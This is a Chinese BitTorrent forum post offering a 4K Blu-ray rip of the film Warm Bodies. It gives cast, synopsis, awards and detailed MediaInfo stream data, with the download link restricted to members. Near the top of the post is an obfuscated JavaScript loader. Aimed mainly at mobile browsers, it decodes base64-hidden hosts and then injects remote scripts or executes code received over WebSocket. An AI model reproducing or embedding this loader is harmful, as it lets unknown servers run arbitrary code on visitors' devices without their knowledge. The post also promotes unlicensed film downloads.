温暖的尸体[中文字幕].Warm.Bodies.2013.2160p.HDR.UHD.BluRay.TrueHD.7.1.Atmos.x265-10bit-迅雷下载 20.47GB

版主小s 2月前 448

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x62\x50\x73\x42\x6e\x58\x4f\x42\x73\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXlxa2RmODc5Zi5hc2xleXR5LmNvbbSxodHRwczovL29oamZrN2pmMjguZ3Nqemxzc3dzLmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译 名 温暖的尸体/僵尸哪有那么帅(台)/温暖躯壳/热血丧男(港)/血仍未冷/血肉之躯

◎片 名 Warm Bodies

◎年 代 2013

◎产 地 美国,加拿大

◎类 别 喜剧 / 爱情 / 恐怖

◎语 言 英语

◎上映日期 2013-02-01(美国) / 2013-02-14(中国香港)

◎IMDb评分 6.8/10 from 222323 users

◎IMDb链接 https://www.imdb.com/title/tt1588173/

◎豆瓣评分 7.5/10 from 112853 users

◎豆瓣链接 https://movie.douban.com/subject/6021916/

◎片 长 98分钟

◎导 演 乔纳森·莱文 Jonathan Levine

◎编 剧 乔纳森·莱文 Jonathan Levine / 艾萨克·马里昂 Isaac Marion

◎主 演 尼古拉斯·霍尔特 Nicholas Hoult

泰莉莎·帕尔墨 Teresa Palmer

约翰·马尔科维奇 John Malkovich

戴夫·弗兰科 Dave Franco

安娜丽·提普顿 Analeigh Tipton

罗伯·考德瑞 Rob Corddry

科里·哈德里克 Cory Hardrict

帕特里克·萨邦圭 Patrick Sabongui

阿伊莎·伊萨 Ayisha Issa

詹维姆维·米勒 Chimwemwe Miller

◎标 签 爱情 | 僵尸 | 美国 | 丧尸 | 喜剧 | 温情 | 2013 | 电影

◎简 介

他(尼古拉斯·霍尔特 Nicholas Hoult 饰)是一只生活在末世的僵尸,依稀只记得自己的名字里有个“R”。与世俗观念不同,作为僵尸他能够思考,依旧残存着些许生前记忆。R生活在废弃的班机上,喜欢收集唱片和饰品,除了吃人外似乎与常人没有两样。这一日,R和僵尸好友们外出觅食,期间遭遇一伙从隔离区来到污染区搜寻药品的人类。在残忍吞噬青年佩里(戴夫·弗兰科 Dave Franco 饰)的大脑后,R拥有了对方的记忆,由此也对和佩里同行而来的女孩朱莉(泰莉莎·帕尔墨 Teresa Palmer 饰)产生恻隐与好感。他将女孩带回自己的住地,通过数日的相处渐渐取得对方的信任,而美丽的朱莉也让R找回作为人类久违的温暖和复杂情感……

本片根据艾萨克·马里昂(Isaac Marion)的同名小说改编。

◎获奖情况

第15届美国青少年选择奖 ?(2013)

最佳喜剧片(提名)

最佳喜剧片男演员(提名) 尼古拉斯·霍尔特

最佳爱情片(提名)

最佳爱情片男演员(提名) 尼古拉斯·霍尔特

最佳突破表演电影新星 尼古拉斯·霍尔特

  1. General

  2. Unique ID : 310046823099797467999522657429317829686 (0xE940D89880A2AE2A80C13DCCB7D14436)

  3. Complete name : Warm.Bodies.2013.2160p.HDR.UHD.BluRay.TrueHD.7.1.Atmos.x265-10bit-HDS.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 20.5 GiB

  7. Duration : 1 h 37 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 30.0 Mb/s

  10. Movie name : Warm Bodies 2013 2160p HDR UHD BluRay TrueHD 7.1 Atmos x265-10bit-HDS

  11. Encoded date : UTC 2021-07-04 14:18:22

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. HDR format : SMPTE ST 2086, HDR10 compatible

  20. Codec ID : V_MPEGH/ISO/HEVC

  21. Duration : 1 h 37 min

  22. Bit rate : 24.5 Mb/s

  23. Width : 3 840 pixels

  24. Height : 2 160 pixels

  25. Display aspect ratio : 16:9

  26. Frame rate mode : Constant

  27. Frame rate : 23.976 (24000/1001/53354) FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 10 bits

  31. Bits/(Pixel*Frame) : 0.123

  32. Stream size : 16.7 GiB (82%)

  33. Title : [email protected]

  34. Writing library : x265 - H.265/HEVC codec

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.2020

  39. Transfer characteristics : PQ

  40. Matrix coefficients : BT.2020 non-constant

  41. Mastering display color primaries : Display P3

  42. Mastering display luminance : min: 0.0020 cd/m2, max: 1000 cd/m2

  43. Maximum Content Light Level : 739 cd/m2

  44. Maximum Frame-Average Light Level : 331 cd/m2


  45. Audio

  46. ID : 2

  47. Format : MLP FBA 16-ch

  48. Format/Info : Meridian Lossless Packing FBA with 16-channel presentation

  49. Commercial name : Dolby TrueHD with Dolby Atmos

  50. Codec ID : A_TRUEHD

  51. Duration : 1 h 37 min

  52. Bit rate mode : Variable

  53. Bit rate : 5 403 kb/s

  54. Maximum bit rate : 10.3 Mb/s

  55. Channel(s) : 8 channels

  56. Channel layout : L R C LFE Ls Rs Lb Rb

  57. Sampling rate : 48.0 kHz

  58. Frame rate : 1 200.000 FPS (40 SPF)

  59. Compression mode : Lossless

  60. Stream size : 3.69 GiB (18%)

  61. Title : English

  62. Language : English

  63. Default : Yes

  64. Forced : No

  65. Number of dynamic objects : 15

  66. Bed channel count : 1 channel

  67. Bed channel configuration : LFE


  68. Text #1

  69. ID : 3

  70. Format : PGS

  71. Muxing mode : zlib

  72. Codec ID : S_HDMV/PGS

  73. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  74. Duration : 1 h 32 min

  75. Bit rate : 17.9 kb/s

  76. Count of elements : 1940

  77. Stream size : 11.8 MiB (0%)

  78. Title : CHS

  79. Language : Chinese

  80. Default : Yes

  81. Forced : No


  82. Text #2

  83. ID : 4

  84. Format : PGS

  85. Muxing mode : zlib

  86. Codec ID : S_HDMV/PGS

  87. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  88. Duration : 1 h 32 min

  89. Bit rate : 18.7 kb/s

  90. Count of elements : 1940

  91. Stream size : 12.3 MiB (0%)

  92. Title : CHT

  93. Language : Chinese

  94. Default : No

  95. Forced : No


  96. Menu

  97. 00:00:00.000 : en:Chapter 01

  98. 00:08:02.524 : en:Chapter 02

  99. 00:14:05.219 : en:Chapter 03

  100. 00:19:23.662 : en:Chapter 04

  101. 00:24:31.595 : en:Chapter 05

  102. 00:31:16.416 : en:Chapter 06

  103. 00:38:02.405 : en:Chapter 07

  104. 00:44:21.117 : en:Chapter 08

  105. 00:49:55.367 : en:Chapter 09

  106. 00:55:43.340 : en:Chapter 10

  107. 00:59:49.753 : en:Chapter 11

  108. 01:03:37.522 : en:Chapter 12

  109. 01:11:12.518 : en:Chapter 13

  110. 01:17:32.273 : en:Chapter 14

  111. 01:22:18.058 : en:Chapter 15

  112. 01:27:23.947 : en:Chapter 16



此处一般会放置磁力链或电驴下载链接,不过此链接需要注册会员才能看到,点击“立即注册”
磁力链下载【磁力链接仅对注册会员开放,登陆后可见】

TAGS 恐怖 喜剧 爱情

上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回